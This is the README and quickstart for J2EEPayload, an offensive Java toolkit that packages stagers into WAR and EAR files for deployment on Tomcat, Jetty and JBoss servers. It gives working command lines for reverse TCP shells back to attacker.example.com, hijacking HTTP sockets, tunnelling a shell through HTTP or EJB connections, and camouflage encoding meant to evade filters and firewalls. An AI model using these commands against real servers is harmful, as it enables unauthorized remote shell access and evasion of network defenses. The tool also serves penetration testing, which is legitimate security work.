J2EEPayload - Java Stager Payloads for enterprise servers

© 2010 Michael 'mihi' Schierl, <schierlm at users dot sourceforge dot net>

Download J2EEPayload-0.1.zip (both source and compiled classes, 478 KB)

Based on JavaPayload 0.2


The JavaPayloads contain useful payloads written in pure Java to leverage vulnerabilities in J2SE environments. But when you find a FTP directory called webapps or deploy where there are WAR or EAR files in them, they do not directly help you, because they do not contain stagers suitable for this environment

Therefore, this archive contains a collection of WAR and EAR compatible stagers that use a variety of communication methods to communicate back to the attacker - even if the only open port is the HTTP/JNDI port, or even if no incoming ports are open but the victim can call back (which can be tricky as usually WARs and EARs are initialized on demand).

In corporate environments (i. e. "enterprise") you might also find picky firewalls that reset your connections whenever you send 0xCAFEBABE, or the only possible means of communication between attacker and victim may be a common directory share where both parties have write access. For forwarding TCP connections in these scenarios, the jTCPfwd package usually is a life saver. Therefore, this archive also contains wrapper code that can be used to wrap a jTCPfwd Listener or Forwarder into a JavaPayload stager.

System requirements

In addition to the system requirements of JavaPayload:

On the "attacker" machine: Application server client libraries (matching to the used appplication serve for attacking an application server via EJB. No additional requirements for attacking a servlet container.

On the "victim" machine: Java Runtime Environment 1.4, and a Servlet-2.2 compatible servlet container or an EJB2 compatible application server.

For the jTCPfwd stagers: no additional system requirements in addition to those of JavaPayload and jTCPfwd.


This quickstart is divided into two parts: First about exploiting servlet containers (like Apache Tomcat), then about exploiting J2EE application servers (like JBoss). As most application servers also contain a servlet container, the servlet exploits can also be used for application servers, if their HTTP port is reachable from the attacker's machine.

This quickstart assumes that you have completed the quickstart of JavaPayload before and you know how handlers, stagers and stages interact.


Servlets are Java classes that handle HTTP requests in a servlet container. Usually you can deploy servlets by packing them into a WAR file and upload it into a webapps or deploy directory. The servlets will automatically be deployed and can be accessed by the path starting with the WAR file name.

Servlet stagers have been tested with Apache Tomcat 3.2, 4.0, 5.0, 5.5, 6.0 and 7.0beta; Jetty 4.2 and 6.1; JBoss 3.2.3 and 5.1.

In the following examples I assume that you have J2EEPayload.jar, JavaPayload.jar, jTCPfwd.jar and servlet-api-2.2.jar in your classpath.

Launching "normal" stagers on the servlet container

The "JavaPayload" servlet (path /jp) can be used to interactively launch stagers on the servlet server. For this, you have to build a war that includes the stagers you want to use.

On the "attacker" machine:

java j2eepayload.builder.WarBuilder Example1.war BindTCP ReverseTCP

java javapayload.handler.stager.StagerHandler ReverseTCP attacker.example.com 2010 -- JSh

On the "victim" machine:

deploy Example1.war to the victim machine (victim.example.com).

Open http://victim.example.com/Example1/jp in your web browser.

Enter ReverseTCP attacker.example.com 2010 -- JSh into the input box and hit return.

Loading a "normal" stager automatically when a servlet is deployed

In rare cases, the attacker can deploy a servlet to a servlet container but cannot access that container via HTTP. But, for some strange reasons, the servlet container can connect back to the attacker. If the servlet container supports the <load-on-startup/> directive (most do, but not all), you can configure a servlet to be initialized after it is deployed, not (as usual) when it is first accessed. This scenario is supported by J2EEPayloads.

On the "attacker" machine"

java j2eepayload.builder.WarBuilder Example2.war ReverseTCP -- ReverseTCP attacker.example.com 2010 -- JSh

java javapayload.handler.stager.StagerHandler ReverseTCP attacker.example.com 2010 -- JSh

On the "victim" machine:

deploy Example2.war to the victim machine, that's it.

Using the ServletFindSock stager

A "FindSock" stager is a stager that tries to "find" the socket that was used to initiate a HTTP connection and hijack it for sending data in both directions. Unlike native findsock implementations, this implementation is in pure Java and uses reflection (starting on the Request and Response objects) to find an object of type java.net.Socket or java.nio.channels.SocketChannel in one of its local variables (or in objects or arrays referenced in local variables, recursively). This works amazingly well in most cases where the whole servlet container is written in Java. In cases where sockets are handled in native code (most servlet connectors for "traditional" webservers, and also when using Apache APR for Tomcat), this stager will fail, though. For the Apache APR case, see the next section. In case the servlet container insists to close the socket quickly, you can add a fifth parameter of "C" which will clone the Socket object and render the original one useless (by removing its SocketImpl reference).

To debug the stager, you can use a fifth argument of "V" (verbose) to print out all the classes and objects the FindSock stager finds on its way instead of hijacking the socket.

This stager is useful if the only connection you can make to the victim machine is via HTTP, and there is no way to connect back to thee attacker either. Note that the FindSock stager will not work via HTTPS.

On the "attacker" machine

java j2eepayload.builder.WarBuilder Example3.war ServletFindSock

deploy Example3.war to the victim machine (victim.example.com)

java javapayload.handler.stager.StagerHandler ServletFindSock victim.example.com 80 /Example3 -- JSh

Using the ServletApacheFindSock stager

In case you are sure that the target is an Apache server, the ApacheFindSock servlet can be used; this one uses some native method trickery to access native APR sockets (as well as the traditional findsock approach, of course). Note that running this stager on non-Apache servers will most likely crash the server; in rare cases it might even crash Apache servers. If the APR method fails (and the server has not crashed yet), it will fall back to the "traditional" FindSock approach.

On the "attacker" machine

java j2eepayload.builder.WarBuilder Example3a.war ServletApacheFindSock

deploy Example3a.war to the victim machine (victim.example.com)

java javapayload.handler.stager.StagerHandler ServletFindSock victim.example.com 80 /Example3a/apache -- JSh

Using the ServletTunnel stager

In cases where the FindSock stager does not work (native connector, HTTPS, etc.), but the only connection you can use is the connection to the servlet container, you can still use the ServletTunnel stager.

Note that this stager is noticably slower and more traffic-consuming, but as a last resort it can be very useful.

This stager supports two modes, streaming and polling mode. A third mode is provided by the Camouflage stager, see below. In streaming mode, it opens two connections to the victim, one POST and one GET connection. These connections are used to stream incoming and outgoing data to the servlet, and are never closed. Every 15 seconds a keep-alive packet is sent. This option is more efficient than the polling mode, but will fail if some proxy, cache or antivirus waits for the request to complete before it is forwarded. In polling mode, both the GET and the POST connections are closed and restarted every time data is sent over them. So, the GET connection will still wait for data (or a configurable timeout), but as soon as data can be returned, the connection will be closed afterwards. The POST connection works the same way. To use polling mode, you have to add an additional timeout parameter (in milliseconds) to the stager command line. Try to use a large timeout (fewer useless requests), but keep it small enough that your firewall/antivirus does not interrupt the connection before data can be sent.

On the "attacker" machine

java j2eepayload.builder.WarBuilder Example4.war ServletTunnel

deploy Example4.war to the victim machine (victim.example.com)

java javapayload.handler.stager.StagerHandler ServletTunnel http://victim.example.com/Example4 -- JSh

— or, to use polling mode (1 second timeout) —

java javapayload.handler.stager.StagerHandler ServletTunnel http://victim.example.com/Example4 1000 -- JSh

Camouflage mode

In camouflage mode, the stager will use only one POST connection using the normal URL encoded parameter and HTML response format. One parameter, named JP, is used to encode all binary data in English-like looking text (to make filtering harder). The response will be encoded in English-like looking text on a sample HTML page. No two requests will be sent at the same time, therefore this will need a lot of more polling then the other alternative. The code is reused from jTCPfwd's Camouflage engine, that's why jTCPfwd has to be on the class path for this one to work.

On the "attacker" machine

java j2eepayload.builder.WarBuilder Example4c.war ServletCamouflageTunnel

deploy Example4c.war to the victim machine (victim.example.com)

java javapayload.handler.stager.StagerHandler ServletCamouflageTunnel http://victim.example.com/Example4c 1000 -- JSh

— or, to use your own parameters —

java javapayload.handler.stager.StagerHandler ServletCamouflageTunnel :http://victim.example.com/Example4c/jpc?count=#C#&x=1#POST#foo=bar&JP=#DATA#&fun=#R99# 1000 -- JSh

Enterprise Java Beans (EJBs)

In case you want to exploit an application server like JBoss (where you have to deploy EARs), this section is for you.

You can create an EAR that contains only a WAR, by calling java j2eepayload.builder.WarBuilder with parameter WAR followed by the parameters used by WarBuilder, for example:

java j2eepayload.builder.EarBuilder WAR ServletTunnel ServletFindSock ReverseTCP

If the application server includes a servlet container you can access, you can use all the attacks above in this way. Note that some application servers do not support the <load-on-startup/> directive for servlets.

In case you cannot access the servlet container (or there is not any), you might be able to access an EJB via JNDI. J2EEPayload contains only Version 2 EJBs, because they are more compatible than the newer Version 3 ones, and it is usually easier to call them from outside an application server via JNDI.

When you want to access an EJB from outside an application server, you need two things:

The EJBs have been tested with JBoss 3.2.3 and JBoss 5.1.

Launching "normal" stagers via EJB

Normal stagers can be started via a stateless session bean that registers itself as JavaPayload.

On the "attacker" machine

java j2eepayload.builder.EarBuilder EJB ReverseTCP

rename EJB_ReverseTCP.ear Example1.ear

deploy Example1.ear to the victim machine

java javapayload.handler.stager.StagerHandler EJB ReverseTCP attacker.example.com # -- JSh

Using the EJBTunnel stager

Data can also be tunneled through the JNDI connection, by using a stateful session bean that registers itself as JavaPayloadTunnel. There are two instances of this EJB created, one for sending data, one for receiving, as calling two methods of one EJB simultaneously will cause trouble.

On the "attacker" machine

java j2eepayload.builder.EarBuilder EJB EJBTunnel

rename EJB_EJBTunnel.ear Example2.ear

deploy Example2.ear to the victim machine (undeploy Example1.ear first)

java javapayload.handler.stager.StagerHandler EJBTunnel -- JSh

jTCPfwd based stagers

To create a jTCPfwd based stager, run java j2eepayload.builder.JTCPfwdBuilder (which will need asm-3.2.jar on the class path), followed by F or L (for Forwarder or Listener), followed by the jTCPfwd module rule that should be used. This will create a new file, jtcpfwd-stager.jar containing either a JTCPfwdForwarder or JTCPfwdListener stager, that can be used with JavaPayload as usual. It expects one stager parameter, the rule (again).

To connect to this stager, stager handlers of the same names are also included in J2EEPayload (or use jTCPfwd standalone and let it forward data to a normal Bind/Reverse stager handler). These stager handlers expect two parameters. The first one is the listener/forwarder rule used by the stager, and the second one is the forwarder/listener rule the stager handler should use to communicate with the stager (which is usually not the same as the rule used by the stager).